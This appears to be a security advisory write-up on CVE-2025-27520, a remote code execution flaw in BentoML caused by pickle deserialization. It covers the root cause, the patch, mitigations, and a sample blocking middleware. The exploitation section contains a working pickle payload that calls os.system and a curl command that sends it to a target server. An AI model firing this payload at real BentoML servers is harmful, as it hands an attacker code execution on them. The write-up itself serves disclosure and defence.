CVE-2025-27520: BentoML Remote Code Execution via Insecure Deserialization
Executive Summary
CVE-2025-27520 is a critical vulnerability in BentoML, a Python library for building AI application serving systems. It allows unauthenticated attackers to execute arbitrary code on the server through insecure deserialization of untrusted data. Specifically, the vulnerability resides in the serde.py module and is triggered when the main server processes requests with the application/vnd.bentoml+pickle media type. The issue is fixed in BentoML version 1.4.3. The CVSS v3.1 score is 9.8 (Critical).
Technical Details
- Affected Software: BentoML
- Affected Versions: >= 1.3.4, < 1.4.3
- Vulnerability Type: Insecure Deserialization (CWE-502)
- Attack Vector: Network
- Privileges Required: None
- User Interaction: None
- CVSS Score: 9.8 (Critical)
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- Affected Component: src/_bentoml_impl/server/app.py
The vulnerability stems from the main BentoML server accepting application/vnd.bentoml+pickle as a valid media type for incoming requests. Python's pickle module is inherently unsafe for deserializing data from untrusted sources: an attacker can craft a malicious pickle payload that executes arbitrary code when the BentoML server deserializes it.
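The affected range listed above (>= 1.3.4, < 1.4.3) can be checked against an installed package. The following is a minimal sketch, not an official tool: the helper names parse_release, is_affected, and installed_bentoml_is_affected are hypothetical, and the parser deliberately looks only at the leading numeric release segment.

```python
import re
from importlib import metadata

AFFECTED_MIN = (1, 3, 4)  # first affected release (inclusive), per the advisory range
FIXED_IN = (1, 4, 3)      # first fixed release (exclusive upper bound)


def parse_release(version: str) -> tuple:
    """Return the leading numeric segment, e.g. '1.4.2.post1' -> (1, 4, 2).

    Simplification: pre-release suffixes such as 'rc1' are ignored.
    """
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if match is None:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(part or 0) for part in match.groups())


def is_affected(version: str) -> bool:
    """True if the version falls inside the affected range."""
    return AFFECTED_MIN <= parse_release(version) < FIXED_IN


def installed_bentoml_is_affected():
    """Check the locally installed package; None means bentoml is not installed."""
    try:
        return is_affected(metadata.version("bentoml"))
    except metadata.PackageNotFoundError:
        return None
```

Calling installed_bentoml_is_affected() inside the environment that runs the service gives a quick first answer. A dependency scanner remains the more reliable option for fleets of deployments.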
Root Cause Analysis
The root cause of CVE-2025-27520 is the insecure use of Python's pickle module in BentoML's request handling logic. The pickle module serializes and deserializes Python objects. However, a pickle stream can name callables that the deserializer invokes while rebuilding an object, so deserializing data from an untrusted source can lead to arbitrary code execution.
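To make that mechanism concrete, here is a deliberately harmless sketch. The class name RunsOnLoad is made up for illustration, and os.getpid stands in for whatever callable a hostile payload would name. The point is only that pickle.loads calls the recorded function instead of rebuilding the original object.

```python
import os
import pickle


class RunsOnLoad:
    """Illustrative class: __reduce__ tells pickle how to 'rebuild' the object."""

    def __reduce__(self):
        # pickle stores this (callable, args) pair in the stream and
        # pickle.loads() calls it. os.getpid is a harmless stand-in.
        return (os.getpid, ())


payload = pickle.dumps(RunsOnLoad())

# Loading does not return a RunsOnLoad instance. It returns whatever the
# recorded callable returned, evaluated in the process that called loads().
result = pickle.loads(payload)
```

Here result is the process ID of the deserializing process, which shows that the choice of function belongs to whoever produced the bytes, not to the code that loads them.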
The vulnerable code is located in src/_bentoml_impl/server/app.py. Prior to version 1.4.3, the application accepted requests with the Content-Type header set to application/vnd.bentoml+pickle without proper validation or sanitization. This allowed an attacker to send a malicious pickle payload to the server, which would then be deserialized, leading to code execution.
The following code snippet illustrates the vulnerable logic before the patch:
# src/_bentoml_impl/server/app.py (Vulnerable Version)
async def api_endpoint(self, name: str, request: Request) -> Response:
    from _bentoml_sdk.io_models import IORootModel
    from bentoml._internal.utils import get_original_func
    from bentoml._internal.utils.http import set_cookies
    from ..serde import ALL_SERDE

    media_type = request.headers.get("Content-Type", "application/json")
    media_type = media_type.split(";")[0].strip()

    # Vulnerable code: No check for application/vnd.bentoml+pickle on main server
    # if media_type == "application/vnd.bentoml+pickle":
    # ... deserialize pickle data ...
    method = self.service.apis[name]
    func = getattr(self._service_instance, name).local
    ctx = self.service.context
In this vulnerable version, there is no explicit check to prevent the application/vnd.bentoml+pickle media type from being processed on the main server. This allows an attacker to send a crafted pickle payload, leading to arbitrary code execution.
Patch Analysis
The fix for CVE-2025-27520 adds a check that explicitly disallows the application/vnd.bentoml+pickle media type on the main BentoML server. This prevents attackers from sending malicious pickle payloads to the server and achieving code execution.
The following diff shows the changes made in src/_bentoml_impl/server/app.py to address the vulnerability:
--- a/src/_bentoml_impl/server/app.py
+++ b/src/_bentoml_impl/server/app.py
@@ -641,12 +641,19 @@ async def api_endpoint(self, name: str, request: Request) -> Response:
         from _bentoml_sdk.io_models import IORootModel
         from bentoml._internal.utils import get_original_func
         from bentoml._internal.utils.http import set_cookies
+        from http import HTTPStatus
         from ..serde import ALL_SERDE
         media_type = request.headers.get("Content-Type", "application/json")
         media_type = media_type.split(";")[0].strip()
+        if self.is_main and media_type == "application/vnd.bentoml+pickle":
+            raise BentoMLException(
+                "application/vnd.bentoml+pickle is not allowed in main server",
+                error_code=HTTPStatus.UNSUPPORTED_MEDIA_TYPE,
+            )
+
         method = self.service.apis[name]
         func = getattr(self._service_instance, name).local
         ctx = self.service.context
Explanation of the Patch:
- Import HTTPStatus: The patch imports the HTTPStatus enum from the http module. This is used to return a proper HTTP error code when the disallowed media type is encountered.
- Check for application/vnd.bentoml+pickle: The patch adds a conditional statement that checks whether the request's Content-Type is application/vnd.bentoml+pickle and whether the current instance is the main server (self.is_main).
- Raise BentoMLException: If both conditions are true, the code raises a BentoMLException with an error message indicating that the media type is not allowed on the main server. The error_code is set to HTTPStatus.UNSUPPORTED_MEDIA_TYPE (415), which is the appropriate HTTP status code for this scenario.
This patch prevents the insecure deserialization by rejecting requests with the application/vnd.bentoml+pickle media type on the main server, which removes this path to arbitrary code execution.
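The decision the patch makes can be isolated as a small pure function, which is convenient for unit testing. This is a sketch under stated assumptions: MediaTypeNotAllowed is a hypothetical stand-in for BentoMLException, and normalize_media_type and check_media_type are illustrative names that do not exist in BentoML. The normalisation and comparison mirror the lines shown in the diff.

```python
from http import HTTPStatus

PICKLE_MEDIA_TYPE = "application/vnd.bentoml+pickle"


class MediaTypeNotAllowed(Exception):
    """Hypothetical stand-in for BentoMLException in this sketch."""

    def __init__(self, message, error_code):
        super().__init__(message)
        self.error_code = error_code


def normalize_media_type(content_type):
    """Mirror the diff: default to JSON when the header is absent,
    drop parameters after ';', and strip surrounding whitespace."""
    if content_type is None:
        content_type = "application/json"
    return content_type.split(";")[0].strip()


def check_media_type(content_type, is_main):
    """Return the normalised media type, or raise on the main server
    when the request asks for pickle deserialization."""
    media_type = normalize_media_type(content_type)
    if is_main and media_type == PICKLE_MEDIA_TYPE:
        raise MediaTypeNotAllowed(
            f"{PICKLE_MEDIA_TYPE} is not allowed in main server",
            error_code=HTTPStatus.UNSUPPORTED_MEDIA_TYPE,
        )
    return media_type
```

For example, check_media_type("application/vnd.bentoml+pickle; charset=utf-8", is_main=True) raises with error_code 415, while the same header with is_main=False passes through, matching the self.is_main condition in the patch.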
Exploitation Techniques
An attacker can exploit this vulnerability by sending a crafted HTTP request to the BentoML server with the Content-Type header set to application/vnd.bentoml+pickle and a malicious pickle payload in the request body.
Here's a conceptual outline of the exploit:
- Craft a Malicious Pickle Payload: The attacker creates a pickle payload that, when deserialized, executes arbitrary code. This can be achieved using various techniques, such as using the __reduce__ method to call functions like os.system or subprocess.Popen.

  A simple example of a malicious pickle payload:

      import pickle
      import base64

      class Exploit(object):
          def __reduce__(self):
              import os
              return (os.system, ('touch /tmp/pwned',))

      serialized_payload = pickle.dumps(Exploit())
      encoded_payload = base64.b64encode(serialized_payload).decode()
      print(f"Base64 Encoded Payload: {encoded_payload}")

  This payload, when deserialized, will execute the command touch /tmp/pwned on the server.

- Send the Malicious Request: The attacker sends an HTTP POST request to a BentoML API endpoint with the Content-Type header set to application/vnd.bentoml+pickle and the base64 encoded pickle payload as the request body.

  Example using curl:

      curl -X POST -H "Content-Type: application/vnd.bentoml+pickle" --data "$(python generate_payload.py)" http://<target_ip>:<port>/<api_endpoint>

  Replace <target_ip>, <port>, and <api_endpoint> with the appropriate values for the target BentoML server.

- Server Deserializes and Executes Code: The BentoML server, if running a vulnerable version, will deserialize the pickle payload, leading to the execution of the attacker's arbitrary code. In this example, it would create a file named /tmp/pwned on the server.
Real-World Impact:
Successful exploitation of this vulnerability can have severe consequences, including:
- Remote Code Execution: Attackers can execute arbitrary code on the server, potentially gaining complete control of the system.
- Data Breach: Attackers can access sensitive data stored on the server, leading to data breaches and privacy violations.
- Denial of Service: Attackers can crash the server or disrupt its normal operation, leading to denial of service.
- Lateral Movement: If the compromised server has access to other systems on the network, attackers can use it as a stepping stone to compromise other systems.
Disclaimer: The exploit above is a simplified, illustrative example for educational purposes only. Real-world exploits may be more complex and sophisticated.
Mitigation Strategies
The following measures are recommended to mitigate CVE-2025-27520:
- Upgrade to BentoML 1.4.3 or later: The most effective mitigation is to upgrade to BentoML version 1.4.3 or later, which includes the fix for this vulnerability.
- Network Segmentation: Implement network segmentation to limit the impact of a successful attack. This can help prevent attackers from moving laterally to other systems on the network.
- Web Application Firewall (WAF): Deploy a WAF to filter out malicious requests. A WAF can be configured to block requests with the application/vnd.bentoml+pickle media type or to inspect the request body for malicious pickle payloads.
- Input Validation: Implement strict input validation to ensure that only trusted data is processed by the server. This can help prevent attackers from injecting malicious payloads.
- Principle of Least Privilege: Grant users and processes only the minimum privileges necessary to perform their tasks. This can help limit the impact of a successful attack.
- Monitoring and Logging: Implement comprehensive monitoring and logging to detect and respond to suspicious activity. This can help identify and contain attacks before they cause significant damage.
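Where an upgrade cannot be rolled out immediately, the media-type filter described in the WAF item can be approximated in-process. The following is a minimal sketch, assuming the externally reachable service is served as an ASGI application. RejectPickleMiddleware and the status_for test helper are hypothetical names, not part of BentoML. Unlike the upstream patch, the sketch lowercases the media type before comparing, a deliberately stricter choice. The source does not say whether internal BentoML components exchange this media type, so a filter like this is best limited to the public entry point.

```python
import asyncio

BLOCKED_MEDIA_TYPE = "application/vnd.bentoml+pickle"


class RejectPickleMiddleware:
    """Pure-ASGI middleware that answers 415 for the pickle media type."""

    def __init__(self, app):
        self.app = app

    async def __call__(self, scope, receive, send):
        if scope["type"] == "http":
            # ASGI delivers header names as lowercased byte strings.
            headers = dict(scope.get("headers") or [])
            raw = headers.get(b"content-type", b"").decode("latin-1")
            media_type = raw.split(";")[0].strip().lower()
            if media_type == BLOCKED_MEDIA_TYPE:
                await send({
                    "type": "http.response.start",
                    "status": 415,
                    "headers": [(b"content-type", b"text/plain")],
                })
                await send({
                    "type": "http.response.body",
                    "body": b"Unsupported Media Type",
                })
                return  # the wrapped application never sees the request
        await self.app(scope, receive, send)


async def _ok_app(scope, receive, send):
    """Trivial downstream app used only to exercise the middleware."""
    await send({"type": "http.response.start", "status": 200, "headers": []})
    await send({"type": "http.response.body", "body": b"ok"})


def status_for(content_type: str) -> int:
    """Drive the middleware with a fake POST and return the response status."""
    sent = []

    async def send(message):
        sent.append(message)

    async def receive():
        return {"type": "http.request", "body": b"", "more_body": False}

    scope = {
        "type": "http",
        "method": "POST",
        "path": "/",
        "headers": [(b"content-type", content_type.encode("latin-1"))],
    }
    asyncio.run(RejectPickleMiddleware(_ok_app)(scope, receive, send))
    return sent[0]["status"]
```

A filter of this kind is a stopgap. It narrows exposure on the public entry point while the upgrade to 1.4.3 or later is scheduled, and it does not replace that upgrade.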
Timeline of Discovery and Disclosure
- Vulnerability Discovered: Unknown
- Vulnerability Reported: Unknown
- Patch Released: BentoML 1.4.3
- CVE Assigned: CVE-2025-27520
- Public Disclosure: 2025-04-04
References
- GitHub Security Advisory: https://github.com/bentoml/BentoML/security/advisories/GHSA-33xw-247w-6hmc
- Commit with Fix: https://github.com/bentoml/BentoML/commit/b35f4f4fcc53a8c3fe8ed9c18a013fe0a728e194